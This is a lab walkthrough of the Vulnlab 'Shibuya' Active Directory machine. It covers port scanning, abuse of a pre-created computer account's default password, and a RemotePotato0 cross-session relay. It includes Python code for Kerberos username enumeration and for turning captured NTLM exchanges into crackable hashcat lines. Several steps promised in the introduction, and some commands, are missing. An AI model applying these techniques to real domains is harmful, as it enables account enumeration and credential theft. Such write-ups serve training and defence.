Vulnlab Shibuya: Active Directory Penetration Testing Walkthrough
This comprehensive Vulnlab walkthrough details my step-by-step approach to compromising the Shibuya Active Directory environment. Starting with initial enumeration and discovery of a pre-created machine account, I leveraged various offensive security techniques including Kerberos authentication, password spraying, and registry hive extraction to gain a foothold. The attack path progressed through cross-session relay attacks and ultimately achieved domain admin privileges via vulnerable certificate templates (ESC1). This penetration testing guide demonstrates practical exploitation of common Active Directory security misconfigurations found in enterprise environments, providing valuable insights for both offensive security professionals and defenders.
Initial Enumeration
The initial port scan showed that the target, AWSJPDC0522.shibuya.vl, is a domain controller for shibuya.vl: DNS, Kerberos, the kpasswd service and the LDAP global catalog are all exposed, alongside SSH (OpenSSH for Windows) and RDP. The RDP NTLM information leaks the domain and host names, and the OS build (10.0.20348, Windows Server 2022):
```
PORT      STATE SERVICE       REASON          VERSION
22/tcp    open  ssh           syn-ack ttl 127 OpenSSH for_Windows_9.5
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory
3269/tcp  open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory
3389/tcp  open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
|   Target_Name: SHIBUYA
|   NetBIOS_Domain_Name: SHIBUYA
|   NetBIOS_Computer_Name: AWSJPDC0522
|   DNS_Domain_Name: shibuya.vl
|   DNS_Computer_Name: AWSJPDC0522.shibuya.vl
|   DNS_Tree_Name: shibuya.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-04-09T09:02:13+00:00
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49939/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49965/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49997/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
```
SMB Enumeration
First, I checked whether anonymous or guest access to SMB was allowed by authenticating with an arbitrary username and an empty password, but access was denied:

```bash
netexec smb shibuya.vl -u 'hello' -p '' --shares
```
User Enumeration
I used Kerbrute to identify valid users in the domain. Kerbrute sends an AS-REQ without pre-authentication data for each candidate name and reads the KDC's error code, so no password is ever tried and no lockout counter is touched; the probes are still visible to defenders as event 4768 failures on the domain controller:
The user list included a computer account, RED$, which turned out to be a pre-created computer account. When a computer account is created in Active Directory Users and Computers with the "Assign this computer account as a pre-Windows 2000 computer" option, its password is set to the computer name in lowercase without the trailing $ (here, red). NTLM logons with such an account are rejected with STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT, but Kerberos authentication succeeds, and according to Microsoft documentation the account can change its own password:
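To make the user-enumeration step concrete, here is an added example (not code from the original write-up or from Kerbrute) showing how a Kerbrute-style scanner classifies the KDC's reply to an AS-REQ sent without pre-authentication. The KRB-ERROR messages are constructed in place with a minimal DER encoder so the example runs offline; the realm and the timestamp are placeholders taken from the scan above, and the error codes are the RFC 4120 values.

```python
# Added example: reading the KDC's answer to a pre-auth-less AS-REQ the way
# Kerbrute does. Messages are CONSTRUCTED with a small DER encoder, not captured.

KDC_ERR_C_PRINCIPAL_UNKNOWN = 6   # no such principal -> username invalid
KDC_ERR_CLIENT_REVOKED = 18       # account disabled or locked out
KDC_ERR_PREAUTH_REQUIRED = 25     # account exists and enforces pre-auth

APP_AS_REP = 0x6B      # [APPLICATION 11] AS-REP: pre-auth not required
APP_KRB_ERROR = 0x7E   # [APPLICATION 30] KRB-ERROR


def der(tag, content):
    """Encode one DER TLV (single-byte tag, length below 65536)."""
    n = len(content)
    if n < 0x80:
        length = bytes([n])
    elif n < 0x100:
        length = b"\x81" + bytes([n])
    else:
        length = b"\x82" + n.to_bytes(2, "big")
    return bytes([tag]) + length + content


def der_int(value):
    """DER INTEGER, minimal two's-complement length."""
    return der(0x02, value.to_bytes((value.bit_length() + 8) // 8, "big", signed=True))


def ctx(n, inner):
    """Context-specific constructed tag [n] around an encoded element."""
    return der(0xA0 | n, inner)


def build_krb_error(error_code, realm="SHIBUYA.VL"):
    """Constructed KRB-ERROR (RFC 4120 5.9.1) with only the mandatory fields."""
    sname = der(0x30, ctx(0, der_int(2)) + ctx(1, der(0x30, der(0x1B, b"krbtgt") + der(0x1B, realm.encode()))))
    body = (
        ctx(0, der_int(5))                        # pvno
        + ctx(1, der_int(30))                     # msg-type = KRB-ERROR
        + ctx(4, der(0x18, b"20250409090213Z"))   # stime (placeholder value)
        + ctx(5, der_int(0))                      # susec
        + ctx(6, der_int(error_code))             # error-code
        + ctx(9, der(0x1B, realm.encode()))       # realm
        + ctx(10, sname)                          # sname = krbtgt/REALM
    )
    return der(APP_KRB_ERROR, der(0x30, body))


def read_tlv(buf, pos):
    """Decode the TLV at pos; return (tag, content, position after it)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                       # long-form length
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def krb_error_code(msg):
    """Return the error-code field of a DER-encoded KRB-ERROR."""
    tag, body, _ = read_tlv(msg, 0)
    if tag != APP_KRB_ERROR:
        raise ValueError("not a KRB-ERROR")
    _, seq, _ = read_tlv(body, 0)           # the inner SEQUENCE
    fields, pos = {}, 0
    while pos < len(seq):
        tag, content, pos = read_tlv(seq, pos)
        fields[tag & 0x1F] = content        # [n] context tag -> field number n
    _, value, _ = read_tlv(fields[6], 0)    # error-code is [6] INTEGER
    return int.from_bytes(value, "big", signed=True)


def classify_as_reply(msg):
    """Map the KDC's reply to a pre-auth-less AS-REQ onto an account state."""
    if msg[0] == APP_AS_REP:
        return "valid (no pre-auth required: AS-REP roastable)"
    code = krb_error_code(msg)
    if code == KDC_ERR_PREAUTH_REQUIRED:
        return "valid"
    if code == KDC_ERR_C_PRINCIPAL_UNKNOWN:
        return "invalid"
    if code == KDC_ERR_CLIENT_REVOKED:
        return "disabled or locked out"
    return f"other KDC error {code}"


if __name__ == "__main__":
    for name, code in (("red$", KDC_ERR_PREAUTH_REQUIRED), ("hello", KDC_ERR_C_PRINCIPAL_UNKNOWN)):
        print(name, "->", classify_as_reply(build_krb_error(code)))
```

The same three-way split (PREAUTH_REQUIRED versus C_PRINCIPAL_UNKNOWN versus CLIENT_REVOKED) is what lets a scanner separate real accounts from guesses without a single password attempt; a bare AS-REP instead of an error means the account has pre-authentication disabled and can be AS-REP roasted.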
BloodHound analysis revealed two users with active sessions on the host: Simon.Watson (whom we already owned) and Nigel.Mills. Because both sessions live on the same machine, I decided on a cross-session relay attack to compromise Nigel.Mills's account: RemotePotato0 abuses DCOM activation to coerce a process running in another user's interactive session into authenticating with NTLM to a listener the attacker controls, where the authentication can be relayed onward or captured for cracking. First, I uploaded RemotePotato0 (which was not flagged by the antivirus on the host):
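What the listener on the attacker's side actually receives from the coerced session is a plain NTLM exchange. As an added example (not code from the original write-up or from RemotePotato0, which performs the coercion and capture itself), the following parses a type 2 CHALLENGE_MESSAGE and a type 3 AUTHENTICATE_MESSAGE and turns them into the crackable NetNTLMv2 line that hashcat mode 5600 expects; the NTLMv1 layout (mode 5500) is handled as well. Both messages are constructed in place with placeholder challenge, proof and blob values, and the sample user, domain and workstation names are assumptions.

```python
import struct

# Added example: parsing a captured NTLM exchange into a crackable line.
# Both messages are CONSTRUCTED below (placeholders, not real HMACs or traffic).

NTLMSSP_NEGOTIATE_UNICODE = 0x00000001
SIGNATURE = b"NTLMSSP\x00"


def build_challenge(server_challenge, flags=NTLMSSP_NEGOTIATE_UNICODE):
    """Constructed CHALLENGE_MESSAGE (type 2) with empty TargetName and TargetInfo."""
    if len(server_challenge) != 8:
        raise ValueError("ServerChallenge must be 8 bytes")
    return (SIGNATURE + struct.pack("<I", 2)
            + struct.pack("<HHI", 0, 0, 48)    # TargetNameFields (empty)
            + struct.pack("<I", flags)
            + server_challenge                 # bytes 24..31
            + bytes(8)                         # Reserved
            + struct.pack("<HHI", 0, 0, 48))   # TargetInfoFields (empty)


def build_authenticate(user, domain, workstation, lm_response, nt_response,
                       flags=NTLMSSP_NEGOTIATE_UNICODE):
    """Constructed AUTHENTICATE_MESSAGE (type 3); Version and MIC zeroed, payload at 88."""
    enc = "utf-16-le" if flags & NTLMSSP_NEGOTIATE_UNICODE else "ascii"
    payload, fields = bytearray(), b""
    # Descriptor order is fixed by the spec: LM, NT, Domain, User, Workstation, SessionKey.
    for data in (lm_response, nt_response, domain.encode(enc),
                 user.encode(enc), workstation.encode(enc), b""):
        fields += struct.pack("<HHI", len(data), len(data), 88 + len(payload))
        payload.extend(data)
    return (SIGNATURE + struct.pack("<I", 3) + fields
            + struct.pack("<I", flags) + bytes(8) + bytes(16) + bytes(payload))


def _field(msg, off):
    """Read a (Len, MaxLen, BufferOffset) descriptor and return the bytes it points at."""
    length, _maxlen, offset = struct.unpack_from("<HHI", msg, off)
    return msg[offset:offset + length]


def _check(msg, msg_type):
    if msg[:8] != SIGNATURE or struct.unpack_from("<I", msg, 8)[0] != msg_type:
        raise ValueError(f"not an NTLM type {msg_type} message")


def parse_challenge(msg):
    """Return the 8-byte ServerChallenge of a type 2 message."""
    _check(msg, 2)
    return msg[24:32]


def parse_authenticate(msg):
    """Extract identity and responses from a type 3 message (offsets are absolute)."""
    _check(msg, 3)
    flags = struct.unpack_from("<I", msg, 60)[0]
    enc = "utf-16-le" if flags & NTLMSSP_NEGOTIATE_UNICODE else "ascii"
    return {
        "lm_response": _field(msg, 12),
        "nt_response": _field(msg, 20),
        "domain": _field(msg, 28).decode(enc),
        "user": _field(msg, 36).decode(enc),
        "workstation": _field(msg, 44).decode(enc),
    }


def to_hashcat(challenge_msg, auth_msg):
    """Combine the exchange into a hashcat line: -m 5600 (NTLMv2) or -m 5500 (NTLMv1)."""
    chal = parse_challenge(challenge_msg)
    a = parse_authenticate(auth_msg)
    nt = a["nt_response"]
    if len(nt) > 24:   # NTLMv2: 16-byte NTProofStr followed by the client blob
        return f"{a['user']}::{a['domain']}:{chal.hex()}:{nt[:16].hex()}:{nt[16:].hex()}"
    return f"{a['user']}::{a['domain']}:{a['lm_response'].hex()}:{nt.hex()}:{chal.hex()}"


# Constructed sample exchange: placeholder values, not real HMACs.
SAMPLE_CHALLENGE = bytes.fromhex("1122334455667788")
SAMPLE_NTPROOF = bytes.fromhex("aa" * 16)
SAMPLE_BLOB = bytes.fromhex("0101000000000000") + bytes.fromhex("bb" * 8)   # RespType header, then a stub


def demo_ntlmv2():
    """Parse the constructed exchange and return the crackable NetNTLMv2 line."""
    chal = build_challenge(SAMPLE_CHALLENGE)
    auth = build_authenticate("Nigel.Mills", "SHIBUYA", "RED", bytes(24), SAMPLE_NTPROOF + SAMPLE_BLOB)
    return to_hashcat(chal, auth)


if __name__ == "__main__":
    print(demo_ntlmv2())
```

The relay variant of the attack skips the cracking step entirely: the same type 3 message is forwarded to a target service, which is why the defensive controls that matter are SMB/LDAP signing and channel binding on the services the authentication could be relayed to, rather than password strength alone.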